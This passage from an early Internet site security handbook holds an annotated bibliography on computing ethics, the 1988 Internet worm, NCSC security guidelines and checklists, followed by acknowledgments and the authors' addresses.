A collection of 40 pieces divided into six sections: the
emergence of worldwide computer networks, electronic break-ins,
worms, viruses, counterculture (articles examining the world
of the “hacker”), and finally a section discussing social,
legal, and ethical considerations.

A thoughtful collection that addresses the phenomenon of
attacks on computers. This includes a number of previously
published articles and some new ones. The previously
published ones are well chosen, and include some references
that might be otherwise hard to obtain. This book is a key
reference to computer security threats that have generated
much of the concern over computer security in recent years.

[ERMANN]
Ermann, D., Williams, M., and C. Gutierrez, Editors,
“Computers, Ethics, and Society”, Oxford University Press,
NY, 1990. (376 pages, includes bibliographical references).

[FORESTER]
Forester, T., and P. Morrison, “Computer Ethics: Tales and
Ethical Dilemmas in Computing”, MIT Press, Cambridge, MA,
1990. (192 pages including index.)

From the preface: “The aim of this book is two-fold: (1) to
describe some of the problems created by society by computers,
and (2) to show how these problems present ethical dilemmas
for computer professionals and computer users.

The problems created by computers arise, in turn, from two
main sources: from hardware and software malfunctions and
from misuse by human beings. We argue that computer systems
by their very nature are insecure, unreliable, and
unpredictable — and that society has yet to come to terms
with the consequences. We also seek to show how society
has become newly vulnerable to human misuse of computers in
the form of computer crime, software theft, hacking, the
creation of viruses, invasions of privacy, and so on.”

The eight chapters include “Computer Crime”, “Software
Theft”, “Hacking and Viruses”, “Unreliable Computers”,
“The Invasion of Privacy”, “AI and Expert Systems”,
and “Computerizing the Workplace.” Includes extensive
notes on sources and an index.

[GOULD]
Gould, C., Editor, “The Information Web: Ethical and Social
Implications of Computer Networking”, Westview Press,
Boulder, CO, 1989.

[IAB89]
Internet Activities Board, “Ethics and the Internet”,
RFC 1087, IAB, January 1989. Also appears in the
Communications of the ACM, Vol. 32, No. 6, Pg. 710,
June 1989.

This memo is a statement of policy by the Internet
Activities Board (IAB) concerning the proper use of
the resources of the Internet. Available on-line on
host ftp.nisc.sri.com, directory rfc, filename rfc1087.txt.
Also available on host nis.nsf.net, directory RFC,
filename RFC1087.TXT-1.

[MARTIN]
Martin, M., and R. Schinzinger, “Ethics in Engineering”,
McGraw Hill, 2nd Edition, 1989.

[MIT89]
Massachusetts Institute of Technology, “Teaching Students
About Responsible Use of Computers”, MIT, 1985-1986. Also
reprinted in the Communications of the ACM, Vol. 32, No. 6,
Pg. 704, Athena Project, MIT, June 1989.

This memo is a statement of policy by the Massachusetts
Institute of Technology (MIT) on the responsible use
of computers.

[NIST]
National Institute of Standards and Technology, “Computer
Viruses and Related Threats: A Management Guide”, NIST
Special Publication 500-166, August 1989.

[NSF88]
National Science Foundation, “NSF Poses Code of Networking
Ethics”, Communications of the ACM, Vol. 32, No. 6, Pg. 688,
June 1989. Also appears in the minutes of the regular
meeting of the Division Advisory Panel for Networking and
Communications Research and Infrastructure, Dave Farber,
Chair, November 29-30, 1988.

This memo is a statement of policy by the National Science
Foundation (NSF) concerning the ethical use of the Internet.

[PARKER90]
Parker, D., Swope, S., and B. Baker, “Ethical Conflicts:
Information and Computer Science, Technology and Business”,
QED Information Sciences, Inc., Wellesley, MA. (245 pages).

Additional publications on Ethics:

The University of New Mexico (UNM)

The UNM has a collection of ethics documents. Included are
legislation from several states and policies from many
institutions.

Access is via FTP, IP address ariel.umn.edu. Look in the
directory /ethics.

8.4 The Internet Worm

[BROCK]
Brock, J., “November 1988 Internet Computer Virus and the
Vulnerability of National Telecommunications Networks to
Computer Viruses”, GAO/T-IMTEC-89-10, Washington, DC,
20 July 1989.

Testimonial statement of Jack L. Brock, Director, U. S.
Government Information before the Subcommittee on
Telecommunications and Finance, Committee on Energy and
Commerce, House of Representatives.

[EICHIN89]
Eichin, M., and J. Rochlis, “With Microscope and Tweezers:
An Analysis of the Internet Virus of November 1988”,
Massachusetts Institute of Technology, February 1989.

Provides a detailed dissection of the worm program. The
paper discusses the major points of the worm program then
reviews strategies, chronology, lessons and open issues,
Acknowledgments; also included are a detailed appendix
on the worm program subroutine by subroutine, an
appendix on the cast of characters, and a reference section.

[EISENBERG89]
Eisenberg, T., D. Gries, J. Hartmanis, D. Holcomb,
M. Lynn, and T. Santoro, “The Computer Worm”, Cornell
University, 6 February 1989.

A Cornell University Report presented to the Provost of the
University on 6 February 1989 on the Internet Worm.

[GAO]
U.S. General Accounting Office, “Computer Security – Virus
Highlights Need for Improved Internet Management”, United
States General Accounting Office, Washington, DC, 1989.

This 36 page report (GAO/IMTEC-89-57), by the U.S.
Government Accounting Office, describes the Internet worm
and its effects. It gives a good overview of the various
U.S. agencies involved in the Internet today and their
concerns vis-a-vis computer security and networking.

Available on-line on host nnsc.nsf.net, directory
pub, filename GAO_RPT; and on nis.nsf.net, directory nsfnet,
filename GAO_RPT.TXT.

[REYNOLDS89]
“The Helminthiasis of the Internet”, RFC 1135,
USC/Information Sciences Institute, Marina del Rey,
CA, December 1989.

This report looks back at the helminthiasis (infestation
with, or disease caused by parasitic worms) of the
Internet that was unleashed the evening of 2 November 1988.
This document provides a glimpse at the infection, its
festering, and cure. The impact of the worm on the Internet
community, ethics statements, the role of the news media,
crime in the computer world, and future prevention are
discussed. A documentation review presents four publications
that describe in detail this particular parasitic computer
program. Reference and bibliography sections are also
included. Available on-line on host ftp.nisc.sri.com,
directory rfc, filename rfc1135.txt. Also available on
host nis.nsf.net, directory RFC, filename RFC1135.TXT-1.

[SEELEY89]
Seeley, D., “A Tour of the Worm”, Proceedings of 1989
Winter USENIX Conference, Usenix Association, San Diego, CA,
February 1989.

Details are presented as a “walk thru” of this particular
worm program. The paper opened with an abstract,
introduction, detailed chronology of events upon the
discovery of the worm, an overview, the internals of the
worm, personal opinions, and conclusion.

[SPAFFORD88]
Spafford, E., “The Internet Worm Program: An
Analysis”, Computer Communication Review, Vol. 19,
No. 1, ACM SIGCOMM, January 1989. Also issued as Purdue
CS Technical Report CSD-TR-823, 28 November 1988.

Describes the infection of the Internet as a worm
program that exploited flaws in utility programs in
UNIX based systems. The report gives a detailed
description of the components of the worm program:
data and functions. Spafford focuses his study on two
completely independent reverse-compilations of the
worm and a version disassembled to VAX assembly language.

[SPAFFORD89]
Spafford, G., “An Analysis of the Internet Worm”,
Proceedings of the European Software Engineering
Conference 1989, Warwick, England, September 1989.
Proceedings published by Springer-Verlag as: Lecture
Notes in Computer Science #387. Also issued
as Purdue Technical Report #CSD-TR-933.

8.5 National Computer Security Center (NCSC)

All NCSC publications, approved for public release, are available
from the NCSC Superintendent of Documents.

NCSC = National Computer Security Center
9800 Savage Road
Ft Meade, MD 20755-6000

CSC = Computer Security Center:
an older name for the NCSC

NTISS = National Telecommunications and
Information Systems Security
NTISS Committee, National Security Agency
Ft Meade, MD 20755-6000

[CSC]
Department of Defense, “Password Management Guideline”,
CSC-STD-002-85, 12 April 1985, 31 pages.

The security provided by a password system depends on
the passwords being kept secret at all times. Thus, a
password is vulnerable to compromise whenever it is used,
stored, or even known. In a password-based authentication
mechanism implemented on an ADP system, passwords are
vulnerable to compromise due to five essential aspects
of the password system: 1) a password must be initially
assigned to a user when enrolled on the ADP system;
2) a user’s password must be changed periodically;
3) the ADP system must maintain a ‘password
database’; 4) users must remember their passwords; and
5) users must enter their passwords into the ADP system at
authentication time. This guideline prescribes steps to be
taken to minimize the vulnerability of passwords in each of
these circumstances.

[NCSC1]
NCSC, “A Guide to Understanding AUDIT in Trusted Systems”,
NCSC-TG-001, Version-2, 1 June 1988, 25 pages.

Audit trails are used to detect and deter penetration of
a computer system and to reveal usage that identifies
misuse. At the discretion of the auditor, audit trails
may be limited to specific events or may encompass all of
the activities on a system. Although not required by
the criteria, it should be possible for the target of the
audit mechanism to be either a subject or an object. That
is to say, the audit mechanism should be capable of
monitoring every time John accessed the system as well as
every time the nuclear reactor file was accessed; and
likewise every time John accessed the nuclear reactor
file.

[NCSC2]
NCSC, “A Guide to Understanding DISCRETIONARY ACCESS CONTROL
in Trusted Systems”, NCSC-TG-003, Version-1, 30 September
1987, 29 pages.

Discretionary control is the most common type of access
control mechanism implemented in computer systems today.
The basis of this kind of security is that an individual
user, or program operating on the user’s behalf, is
allowed to specify explicitly the types of access other
users (or programs executing on their behalf) may have to
information under the user’s control. […] Discretionary
controls are not a replacement for mandatory controls. In
any environment in which information is protected,
discretionary security provides for a finer granularity of
control within the overall constraints of the mandatory
policy.

[NCSC3]
NCSC, “A Guide to Understanding CONFIGURATION MANAGEMENT
in Trusted Systems”, NCSC-TG-006, Version-1, 28 March 1988,
31 pages.

Configuration management consists of four separate tasks:
identification, control, status accounting, and auditing.
For every change that is made to an automated data
processing (ADP) system, the design and requirements of the
changed version of the system should be identified. The
control task of configuration management is performed
by subjecting every change to documentation, hardware, and
software/firmware to review and approval by an authorized
authority. Configuration status accounting is responsible
for recording and reporting on the configuration of the
product throughout the change. Finally, through the process
of a configuration audit, the completed change can be
verified to be functionally correct, and for trusted
systems, consistent with the security policy of the system.

[NTISS]
NTISS, “Advisory Memorandum on Office Automation Security
Guideline”, NTISSAM CONPUSEC/1-87, 16 January 1987,
58 pages.

This document provides guidance to users, managers, security
officers, and procurement officers of Office Automation
Systems. Areas addressed include: physical security,
personnel security, procedural security, hardware/software
security, emanations security (TEMPEST), and communications
security for stand-alone OA Systems, OA Systems
used as terminals connected to mainframe computer systems,
and OA Systems used as hosts in a Local Area Network (LAN).
Differentiation is made between those Office Automation
Systems equipped with removable storage media only (e.g.,
floppy disks, cassette tapes, removable hard disks) and
those Office Automation Systems equipped with fixed media
(e.g., Winchester disks).

Additional NCSC Publications:

[NCSC4]
National Computer Security Center, “Glossary of Computer
Security Terms”, NCSC-TG-004, NCSC, 21 October 1988.

[NCSC5]
National Computer Security Center, “Trusted
Computer System Evaluation Criteria”, DoD 5200.28-STD,
CSC-STD-001-83, NCSC, December 1985.

[NCSC7]
National Computer Security Center, “Guidance for
Applying the Department of Defense Trusted Computer System
Evaluation Criteria in Specific Environments”,
CSC-STD-003-85, NCSC, 25 June 1985.

[NCSC8]
National Computer Security Center, “Technical Rationale
Behind CSC-STD-003-85: Computer Security Requirements”,
CSC-STD-004-85, NCSC, 25 June 85.

[NCSC9]
National Computer Security Center, “Magnetic Remanence
Security Guideline”, CSC-STD-005-85, NCSC, 15 November 1985.

This guideline is tagged as a “For Official Use Only”
exemption under Section 6, Public Law 86-36 (50 U.S. Code
402). Distribution authorized to U.S. Government agencies
and their contractors to protect unclassified technical,
operational, or administrative data relating to operations
of the National Security Agency.

[NCSC10]
National Computer Security Center, “Guidelines for Formal
Verification Systems”, Shipping list no.: 89-660-P, The
Center, Fort George G. Meade, MD, 1 April 1990.

[NCSC11]
National Computer Security Center, “Glossary of Computer
Security Terms”, Shipping list no.: 89-254-P, The Center,
Fort George G. Meade, MD, 21 October 1988.

[NCSC12]
National Computer Security Center, “Trusted UNIX Working
Group (TRUSIX) rationale for selecting access control
list features for the UNIX system”, Shipping list no.:
90-076-P, The Center, Fort George G. Meade, MD, 1990.

[NCSC13]
National Computer Security Center, “Trusted Network
Interpretation”, NCSC-TG-005, NCSC, 31 July 1987.

[NCSC14]
Tinto, M., “Computer Viruses: Prevention, Detection, and
Treatment”, National Computer Security Center C1
Technical Report C1-001-89, June 1989.

[NCSC15]
National Computer Security Conference, “12th National
Computer Security Conference: Baltimore Convention Center,
Baltimore, MD, 10-13 October, 1989: Information Systems
Security, Solutions for Today – Concepts for Tomorrow”,
National Institute of Standards and National Computer
Security Center, 1989.

8.6 Security Checklists

[AUCOIN]
Aucoin, R., “Computer Viruses: Checklist for Recovery”,
Computers in Libraries, Vol. 9, No. 2, Pg. 4,
1 February 1989.

[WOOD]
Wood, C., Banks, W., Guarro, S., Garcia, A., Hampel, V.,
and H. Sartorio, “Computer Security: A Comprehensive Controls
Checklist”, John Wiley and Sons, Interscience Publication,
1987.

8.7 Additional Publications

Defense Data Network’s Network Information Center (DDN NIC)

The DDN NIC maintains DDN Security bulletins and DDN Management
bulletins online on the machine: NIC.DDN.MIL. They are available
via anonymous FTP. The DDN Security bulletins are in the
directory: SCC, and the DDN Management bulletins are in the
directory: DDN-NEWS.

For additional information, you may send a message to:
NIC@NIC.DDN.MIL, or call the DDN NIC at: 1-800-235-3155.

[DDN88]
Defense Data Network, “BSD 4.2 and 4.3 Software Problem
Resolution”, DDN MGT Bulletin #43, DDN Network Information
Center, 3 November 1988.

A Defense Data Network Management Bulletin announcement
on the 4.2bsd and 4.3bsd software fixes to the Internet
worm.

[DDN89]
DCA DDN Defense Communications System, “DDN Security
Bulletin 03”, DDN Security Coordination Center,
17 October 1989.

IEEE Proceedings

[IEEE]
“Proceedings of the IEEE Symposium on Security
and Privacy”, published annually.

IEEE Proceedings are available from:

Computer Society of the IEEE
P.O. Box 80452
Worldway Postal Center
Los Angeles, CA 90080

Other Publications:

Computer Law and Tax Report
Computers and Security
Security Management Magazine
Journal of Information Systems Management
Data Processing & Communications Security
SIG Security, Audit & Control Review

9. Acknowledgments

Thanks to the SSPHWG’s illustrious “Outline Squad”, who assembled at
USC/Information Sciences Institute on 12-June-90: Ray Bates (ISI),
Frank Byrum (DEC), Michael A. Contino (PSU), Dave Dalva (Trusted
Information Systems, Inc.), Jim Duncan (Penn State Math Department),
Bruce Hamilton (Xerox), Sean Kirkpatrick (Unisys), Tom Longstaff
(CIAC/LLNL), Fred Ostapik (SRI/NIC), Keith Pilotti (SAIC), and Bjorn
Satdeva (/sys/admin, inc.).

Many thanks to Rich Pethia and the Computer Emergency Response Team
(CERT); much of the work by Paul Holbrook was done while he was
working for CERT. Rich also provided a very thorough review of this
document. Thanks also to Jon Postel and USC/Information Sciences
Institute for contributing facilities and moral support to this
effort.

Last, but NOT least, we would like to thank members of the SSPHWG and
Friends for their additional contributions: Vint Cerf (CNRI),
Dave Grisham (UNM), Nancy Lee Kirkpatrick (Typist Extraordinaire),
Chris McDonald (WSMR), H. Craig McKee (Mitre), Gene Spafford (Purdue),
and Aileen Yuan (Mitre).

10. Security Considerations

If security considerations had not been so widely ignored in the
Internet, this memo would not have been possible.

11. Authors’ Addresses

J. Paul Holbrook
CICNet, Inc.
2901 Hubbard
Ann Arbor, MI 48105

Phone: (313) 998-7680
EMail: holbrook@cic.net

Joyce K. Reynolds
University of Southern California
Information Sciences Institute
4676 Admiralty Way
Marina del Rey, CA 90292

Phone: (213) 822-1511
EMail: JKREY@ISI.EDU
